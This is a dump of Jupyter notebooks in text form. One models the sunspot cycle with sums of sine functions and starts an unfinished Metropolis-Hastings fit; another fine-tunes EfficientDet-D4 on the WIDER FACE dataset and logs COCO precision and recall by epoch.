start = start + relativedelta(day=1, months=1)
end = start + relativedelta(day=1, months=2)
#print(dt, start, end)
df = getCol(start, end)
df

df

getEventsDf()
calender.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Load our data in and take a look at both the raw data and also visualize it import pandas as pd import matplotlib.pyplot as plt import numpy as np # + silsoJD = pd.read_csv('./sunspot_data/SILSO_daily_inJD.txt', delimiter='\s+', usecols=[0,1,2,3,4], skiprows=1) silsoJD.columns = ['JD', 'SSN', 'std', 'observations', 'definitive indicator'] # - silsoJD # + plt.figure(figsize=(20,10)) plt.title('WDC-SILSO sunspot numbers 1818-2020') plt.scatter(range(len(silsoJD['SSN'])), silsoJD['SSN'], s=4) #note: value of -1 means no data collected that day. need to cut out # - # ## Take care of that note and clean it up, doesn't really make much of a difference but we'll be thorough anyway cleaned_data = silsoJD['SSN'].replace(-1.0, np.nan) dates = [date for date in range(len(silsoJD['SSN']))] # ## Some naive guesses at what a model might look like, keep tweaking and adding sine functions until something is reasonable enough to move forward with # + #convert to degrees for np.sin because it makes more sense in my head dates_deg = [date*np.pi/180 for date in dates] period1 = (len(dates)/360) / 18.33 #number of periods (in degrees) divided by how many i counted by eye phase1 = np.pi - np.arcsin(0.25) #around where the function starts (back to radians because i hate myself) func1arg = [date/period1 + phase1 for date in dates_deg] period2 = (len(dates)/360) / 1.75 phase2 = np.arcsin(0.25) func2arg = [date/period2 + phase2 for date in dates_deg] #units are counts amplitude1 = 180 amplitude2 = 60 offset1 = 70 offset2 = 70 function1 = (amplitude1 * (np.sin(func1arg)) + offset1) function2 = (amplitude2 * (np.sin(func2arg)) + offset2) total_function = (function1 + function2) + silsoJD['std'] total_function[total_function <0] = 0 # - fig = plt.figure(figsize=(20,10)) 
plt.title('WDC-SILSO sunspot numbers 1818-2020')
plt.xticks(np.arange(0, len(dates), 11*360), labels=np.arange(1818,2020, 11))
plt.xlim(-1000, len(dates)+1000)
plt.scatter(dates, cleaned_data, s=4, alpha=0.5)
plt.plot(dates, function1, c='g', ls='--', linewidth=5)
plt.plot(dates, function2, c='r', ls='--', linewidth=5)
plt.plot(dates, total_function, c='k', linewidth=3)

# ### Here's what a model for this probably looks like:
#
# $$
# SSN(t) = \left(A_1\! \sin(B_1t + C_1) + D_1\right) \ + \ \left(A_2\! \sin(B_2t + C_2) + D_2\right) \ + \ ...
# $$
#
# Where $A$ is amplitude, $B$ is period, $C$ is our phase shift, and $D$ is our displacement. For this project, we'll only focus on the 2 obvious cycles in this data: the commonly known ~11 year cycle, and what appears to be a cycle of around 115 years. Evidence suggests longer cycles such as:
#
# - The 210 year Suess cycle
# - The ~2,400 year Hallstatt cycle
# - Cycles of various years including (105, 131, 232, 385, etc.)
# - Unnamed cycle of possibly >6,000 years
#
# A lot of these cycles look at radiocarbon dating, and geological observations. We're only dealing with recorded sunspot numbers from visual observations from the past 200 years so it isn't prudent to consider them for this modeling.
#
# ## That being said, now we can make a Metropolis-Hastings code to sample our functions and have that come up with a better fit...........maybe

# +
#create our model
def ssn_model(A1, B1, C1, D1, A2, B2, C2, D2, timeseries):
    """Sum of two sinusoids evaluated at the given times.

    Each component is ``A * sin(t / B + C) + D``, so B acts as a period
    *divisor* (larger B -> longer period), matching the hand-tuned fit above.

    Parameters
    ----------
    A1, B1, C1, D1 : float
        Amplitude, period divisor, phase shift, and vertical offset of component 1.
    A2, B2, C2, D2 : float
        The same parameters for component 2.
    timeseries : array-like of float
        Times at which to evaluate the model.

    Returns
    -------
    numpy.ndarray
        Modelled sunspot number at each time in ``timeseries``.
    """
    # Vectorized: the original built intermediate Python lists with
    # per-element comprehensions before handing them to np.sin; a single
    # ndarray expression is numerically identical and runs at C speed,
    # which matters on long daily series like this one.
    t = np.asarray(timeseries, dtype=float)
    sine1 = A1 * np.sin(t / B1 + C1) + D1
    sine2 = A2 * np.sin(t / B2 + C2) + D2
    return sine1 + sine2

#for posterity's sake, we'll copy G's HW4 solution of visualizing how changing each parameter affects the overall structure
#i already spent time doing this by hand above to fine tune parameters, but this will be good to show for others
#LOOK AT YOUR DATA!
datestest = np.arange(0,2*np.pi,.01) atest1 = 10 atest2 = 5 btest1 = (len(datestest)/360) / 18.33 btest2 = (len(datestest)/360) / 1.75 ctest1 = np.pi - np.arcsin(0.25) ctest2 = np.arcsin(0.25) dtest1 = 70 dtest2 = 70 fig, axs = plt.subplots(nrows=2, ncols=4, sharex=False, figsize=(20, 8)) ax1, ax2, ax3, ax4 = axs[0] ax5, ax6, ax7, ax8 = axs[1] for A1x in [90, 180, 270]: ax1.plot(datestest, ssn_model(A1x, btest1, ctest1, dtest1, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={A1x:.1f}') ax1.legend(frameon=False) ax1.set_xlabel('t') ax1.set_ylabel('SSN') ax1.set_title('Varying Amplitude 1') for B1x in [(len(datestest)/360)/5, (len(datestest)/360)/15, (len(datestest)/360)/25]: ax2.plot(datestest, ssn_model(atest1, B1x, ctest1, dtest1, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={B1x:.1f}') ax2.legend(frameon=False) ax2.set_xlabel('t') ax2.set_ylabel('SSN') ax2.set_title('Varying Period 1') for C1x in [np.pi - np.arcsin(0), np.pi - np.arcsin(0.5), np.pi - np.arcsin(1)]: ax3.plot(datestest, ssn_model(atest1, btest1, C1x, dtest1, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={C1x:.1f}') ax3.legend(frameon=False) ax3.set_xlabel('t') ax3.set_ylabel('SSN') ax3.set_title('Varying Phase 1') for D1x in [0, 20, 40]: ax4.plot(datestest, ssn_model(atest1, btest1, ctest1, D1x, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={D1x:.1f}') ax4.legend(frameon=False) ax4.set_xlabel('t') ax4.set_ylabel('SSN') ax4.set_title('Varying Offset 1') for A2x in [20, 60, 100]: ax5.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, A2x, btest2, ctest2, dtest2, datestest), label=f'Amplitude={A2x:.1f}') ax5.legend(frameon=False) ax5.set_xlabel('t') ax5.set_ylabel('SSN') ax5.set_title('Varying Amplitude 2') for B2x in [(len(datestest)/360)/1, (len(datestest)/360)/1.75, (len(datestest)/360)/3]: ax6.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, atest2, B2x, ctest2, dtest2, datestest), label=f'Amplitude={B2x:.1f}') 
ax6.legend(frameon=False) ax6.set_xlabel('t') ax6.set_ylabel('SSN') ax6.set_title('Varying Period 2') for C2x in [np.arcsin(0), np.arcsin(0.25), np.arcsin(0.5)]: ax7.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, atest2, btest2, C2x, dtest2, datestest), label=f'Amplitude={C2x:.1f}') ax7.legend(frameon=False) ax7.set_xlabel('t') ax7.set_ylabel('SSN') ax7.set_title('Varying Phase 2') for D2x in [0, 20, 40]: ax8.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, atest2, btest2, ctest2, D2x, datestest), label=f'Amplitude={D2x:.1f}') ax8.legend(frameon=False) ax8.set_xlabel('t') ax8.set_ylabel('SSN') ax8.set_title('Varying Offset 2') fig.tight_layout() # - # ### It's a little bit hectic there, but you can start to get the sense of what's happening overall. In the nonvaried parameters, function 1 is the smaller, faster function while function 2 is the function that takes place over a much larger period of time. Overlaying the 2 constituent sine functions might add more clarity of what's going on behind the scenes (go back to the proposed model over the actual data above), but it's also a lot more visual noise for already congested figures. # # ### Let's try out our MH now # + # we'll define a chisq function for scipy optimize def chisq(x, *args): I_0, p, tmax, tE = x t, y, dy = args mod = logmodel(I_0, p, tmax, tE, t) chisq = np.sum(((y - mod)**2.)/(dy**2.))/(len(t) -4) return chisq # and a log likelihood function for our Metropolis-Hastings implementation def LogLikelihood(I_0, p, tmax, tE, t, y, dy): x = (I_0, p, tmax, tE) args = (t, y, dy) negLogLike = chisq(x, *args) return -negLogLike/2. 
# we'll set some very loose bounds on each parameter bounds = [(16, 18), (0, 2), (2458400, 2458600), (10, 60)] # we need to pass the data to scipy.optimize args = (data['t'], data['y'], data['dy']) res = so.minimize(chisq, guess, args=args, bounds=bounds) print(res) # and we can use the Hessian inverse to set the step size for metropolis-hastings # this choice is good because it should ensure we sample the distribution well. sigmas = np.diag(res.hess_inv.todense())**0.5 print('Sigmas =', sigmas) # - # Further things that could be done: (Frank attempting Fourier component analysis?) # # -Refine our model. In reality, the period seems to vary from one cycle to another. Instead of it being in the form of # $$ # SSN(t) = \left(A_1\! \sin(B_1t + C_1) + D_1\right) \ + \ \left(A_2\! \sin(B_2t + C_2) + D_2\right) \ + \ ... # $$ # # a more accurate model might be a similar series but of finite lengths of time, instead of overarching periodic functions that last forever: # # $$ # SSN(t) = \left(A_1\! \sin(B_1(t_1 -t_2) + C_1) + D_1\right) \ + \ \left(A_2\! \sin(B_2(t_3-t_4) + C_2) + D_2\right) \ + \ ... # $$
chris_notebook.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/DarekGit/automl/blob/master/efficientdet/faces_test_EfficientDet_D4.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="V8-yl-s-WKMG" # # Test of EfficientDet with Faces datasets # # # # <table align="left"><td> # <a target="_blank" href="https://github.com/DarekGit/automl/blob/master/efficientdet/faces_test_EfficientDet_D4.ipynb"> # <img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on github # </a> # </td><td> # <a target="_blank" href="https://github.com/DarekGit/automl/blob/master/efficientdet/faces_test_EfficientDet_D4.ipynb"> # <img width=32px src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a> # </td></table> # # <br><br><br><br><br><br> # # https://github.com/DarekGit/automl/tree/master/efficientdet # + [markdown] id="muwOCNHaq85j" # # 0. Install. # + [markdown] id="dggLVarNxxvC" # ## 0.1 Install package and download source code/image. 
# # # + id="t76-4tVYs0uX" colab={"base_uri": "https://localhost:8080/"} outputId="10873241-d35e-49ac-a1d0-4996e7401281" # !nvidia-smi # + id="e_OpaA_pWkvx" colab={"base_uri": "https://localhost:8080/"} outputId="f0b5fdff-2f05-4e19-9379-aea373ae240c" # OUTPUT_DIR on gdrive (Google Drive) or tmp import os output='gdrive' # @param gdrive for google drive if output == 'gdrive': from google.colab import drive drive.mount('/content/drive') OUTPUT_DIR = os.path.join("/content/drive/My Drive/", "tmp") os.makedirs(OUTPUT_DIR, exist_ok=True) else: OUTPUT_DIR = output # + id="hGL97-GXjSUw" #originally https://github.com/google/automl # %%capture #@title import os import sys import tensorflow.compat.v1 as tf # Download source code. if "efficientdet" not in os.getcwd(): # !git clone --depth 1 https://github.com/DarekGit/automl os.chdir('automl/efficientdet') sys.path.append('.') # !pip install -r requirements.txt # !pip install -U 'git+https://github.com/cocodataset/cocoapi.git#subdirectory=PythonAPI' else: # !git pull # + id="ro2qY4Mc304a" from PIL.Image import Image MODEL = 'efficientdet-d4' # @param def download(m): if m not in os.listdir(): # !wget https://storage.googleapis.com/cloud-tpu-checkpoints/efficientdet/coco/{m}.tar.gz # !tar zxf {m}.tar.gz ckpt_path = os.path.join(os.getcwd(), m) return ckpt_path # Download checkpoint. ckpt_path = download(MODEL) print('Use model in {}'.format(ckpt_path)) min_score_thresh = 0.35 #@param max_boxes_to_draw = 2000 #@param line_thickness = 2. 
#@param # + [markdown] id="6h2_QdGazeJy" # ## 0.2 Datasets download # + id="gV0wWy7_mO5s" #WiderFace datasets downwload import os def Wider_load(val=True,train=True,test=False): os.makedirs('WIDER/', exist_ok=True) if val: # #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDd3dIRmpvSk8tLUk # !gdown https://drive.google.com/uc?id=1-5A_pa_jDS7gk8mHVCBB7ApV5KN8jWDr -O WIDER/tempv.zip # !unzip -q WIDER/tempv.zip -d WIDER # !rm WIDER/tempv.zip if train: ### WIDER Face Training Images # #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDQUUwd21EckhUbWs # !gdown https://drive.google.com/uc?id=1-1iJfmXKYvAx9uLdRDX5W6HHG_KZv1jH -O WIDER/temptr.zip # !unzip -q WIDER/temptr.zip -d WIDER # !rm WIDER/temptr.zip if test: # #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDbW4tdGpaYjgzZkU # !gdown https://drive.google.com/uc?id=1tTpUJZEQMKDVxKT6100V5FwDuGX_8sDi -O WIDER/tempt.zip # !unzip -q WIDER/tempt.zip -d WIDER # !rm WIDER/tempt.zip ### Face annotations # !wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/bbx_annotation/wider_face_split.zip -O WIDER/tempa.zip # !unzip -q WIDER/tempa.zip -d WIDER # !rm WIDER/tempa.zip ### Examples and formats of the submissions # #!wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/example/Submission_example.zip Wider_load(val=True,train=True,test=False) # + id="I8weY1WwfPMZ" #Faces_DD dataset download - hi-res import json # !gdown 'https://drive.google.com/uc?export=download&id=1XwVm-2EMFdy9Zq39pKFr5UoSJvgTOm-7' # !unzip -oq Faces_DD.zip # !rm Faces_DD.zip # !gdown 'https://drive.google.com/uc?export=download&id=1gIIUK518Ft9zi3VDVQZLRVozI-Hkpgt2' -O Annotations.json # + [markdown] id="t6aiAixVPERo" # # 1. Training EfficientDet on WIDER FACE. 
# # # # + [markdown] id="r2mNo0dFzv0d" # ## 1.1 Data preparation # + id="dzS3ycPKPERt" # !mkdir tfrecord # !PYTHONPATH=".:$PYTHONPATH" python dataset/create_wider_tfrecord.py \ # --data_dir='' --output_path=tfrecord/wider # + id="L0WKd7H-PER2" colab={"base_uri": "https://localhost:8080/"} outputId="e450bd61-b22e-49a7-ec21-c0c7af539d64" # WiderFace has 12880 train images with 40 shards epoch, here we use a single shard # for demo, but users should use all shards pascal-*-of-00100.tfrecord. file_pattern = 'wider_train-*-of-00040.tfrecord' # @param file_pattern_v = 'wider_val-*-of-00040.tfrecord' # @param images_per_epoch = 322 * len(tf.io.gfile.glob('tfrecord/' + file_pattern)) images_per_epoch = images_per_epoch // 8*8 # round to 8. print('images_per_epoch = {}'.format(images_per_epoch)) # + id="VRNaEvZdRo7i" colab={"base_uri": "https://localhost:8080/"} outputId="7f4b9286-dce5-4e67-fdc9-6ee5d6c4b26c" # OUTPUT_DIR on gdrive (Google Drive) or tmp output='gdrive' # @param gdrive for google drive if output == 'gdrive': from google.colab import drive drive.mount('/content/drive') OUTPUT_DIR = os.path.join("/content/drive/My Drive/", "tmp") os.makedirs(OUTPUT_DIR, exist_ok=True) else: OUTPUT_DIR = output # + [markdown] id="j6rRBB7Iz5dL" # ## 1.2 Training # + id="1OtZrjqdPER4" # generating train tfrecord is large, so we skip the execution here. # 2h per epoch on TESLA V100 import os if MODEL not in os.listdir(): # !wget https://storage.googleapis.com/cloud-tpu-checkpoints/efficientdet/coco/{MODEL}.tar.gz # !tar xf {MODEL}.tar.gz os.makedirs(OUTPUT_DIR+'/model_dir/', exist_ok=True) train_batch_size=2 # @param num_epochs=200 # @param # key option: use --ckpt rather than --backbone_ckpt. 
# !python main.py --mode=train_and_eval \ # --training_file_pattern=tfrecord/{file_pattern} \ # --validation_file_pattern=tfrecord/{file_pattern_v} \ # --model_name={MODEL} --ckpt={MODEL} \ # --model_dir='{OUTPUT_DIR}/model_dir/{MODEL}-finetune' \ # --train_batch_size={train_batch_size} \ # --eval_batch_size=2 --eval_samples=3224 \ # --num_epochs={num_epochs} \ # --num_examples_per_epoch={images_per_epoch} \ # --save_checkpoints_steps=3220 \ # --iterations_per_loop=400 \ # --hparams="num_classes=2,moving_average_decay=0, \ # mixed_precision=false, \ # max_instances_per_image=2000, \ # first_lr_drop_epoch=75.0, \ # second_lr_drop_epoch=125.0" # + [markdown] id="kCW0peYxUy9F" # Results after 1. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.264 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.504 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.258 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.128 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.563 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.668 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.055 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.197 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.319 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.189 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.637 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.748 # ``` # + [markdown] id="s_9TjanSh5uV" # Results after 2. 
epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.273 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.512 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.274 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.129 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.597 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.686 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.056 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.204 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.324 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.188 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.665 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.758 # ``` # # + [markdown] id="f9Q_kmScKNwc" # Results after 6. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.313 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.575 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.311 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.173 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.618 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.697 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.058 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.219 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.369 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.243 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.683 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.770 # ``` # # + [markdown] id="C_-4pH9yv5Qt" # Results after 9 epochs # # ``` 
# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.320 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.590 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.318 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.183 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.621 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.713 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.219 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.372 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.244 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.688 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.782 # ``` # # + [markdown] id="noCFx46okNfH" # *Results* after **13 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.336 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.600 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.339 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.198 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.641 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.722 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.060 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.228 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.387 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.260 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.703 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.789 # ``` # # + [markdown] id="1fmXxZz23UDs" # *Results* after **51 epochs** # # ``` 
# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.338 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.610 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.340 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.208 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.628 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.696 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.224 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.393 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.273 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.693 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.767 # ``` # # + [markdown] id="WPvRtvCLl0wn" # *Results* after **61 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.342 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.617 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.341 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.210 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.633 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.700 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.226 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.394 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.274 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.696 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.763 # ``` # # + [markdown] id="bX7wcWqomCyN" # *Results* after **87 epochs** # # ``` 
# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.616 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.347 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.217 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.636 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.701 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.229 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.400 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.279 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.705 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.772 # # ``` # # + [markdown] id="j9HpFh-0FKas" # Results after **179 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.628 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.224 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.611 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.684 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.058 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.226 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.404 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.292 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.685 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.753 # ``` # # + [markdown] id="RW26DwfirQQN" # # 2. 
COCO evaluation # + [markdown] id="cfn_tRFOWKMO" # ## 2.1 COCO evaluation on validation set. # + id="Xbc_l-qxDkat" file_pattern_v = 'wider_val-*-of-00040.tfrecord' # !python main.py --mode=eval \ # --validation_file_pattern=tfrecord/{file_pattern_v} \ # --model_name={MODEL} \ # --model_dir='{OUTPUT_DIR}/model_dir/{MODEL}-finetune/archive' \ # --ckpt={MODEL} \ # --eval_batch_size=8 --eval_samples=3224 \ # --hparams="num_classes=2,moving_average_decay=0,mixed_precision=false, max_instances_per_image=2000, grad_checkpoint=True" # + [markdown] id="Qg8NpsVMDkax" # Results after 179. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.628 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.224 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.611 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.684 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.058 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.226 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.404 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.292 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.685 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.753 # ``` # # + [markdown] id="mDp_acD1pUcx" # ## 2.2 Model evaluation on Faces_DD dataset. 
Hi-res # + id="prR2uqeIv5-x" # !mkdir tfrecord # !PYTHONPATH=".:$PYTHONPATH" python dataset/create_faces_tfrecord.py \ # --data_dir='' --output_path=tfrecord/faces # + id="bd3Exa-sv5-2" colab={"base_uri": "https://localhost:8080/"} outputId="bd899495-2974-4644-fe13-ebe69067197c" # Faces_DD has 925 train images with 25 shards epoch, here we use a single shard # for demo, but users should use all shards pascal-*-of-00100.tfrecord. file_pattern_face = 'faces-*-of-00025.tfrecord' # images_per_epoch = 37 * len(tf.io.gfile.glob('tfrecord/' + file_pattern_face)) images_per_epoch = images_per_epoch // 8*8 # round to 8. print('images_per_epoch = {}'.format(images_per_epoch)) # + id="Jvx_8pJGEs8C" # generating train tfrecord is large, so we skip the execution here. import os # key option: use --ckpt # !python main.py --mode=eval \ # --validation_file_pattern=tfrecord/{file_pattern_face} \ # --model_name={MODEL} \ # --model_dir='{OUTPUT_DIR}/model_dir/{MODEL}-finetune/archive' \ # --ckpt={MODEL} \ # --eval_batch_size=8 --eval_samples=920 \ # --hparams="num_classes=2,moving_average_decay=0,mixed_precision=false, grad_checkpoint=True" # + [markdown] id="7DZeaDvdZHNG" # Results on Faces_DD with model **trained 6 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.658 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.945 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 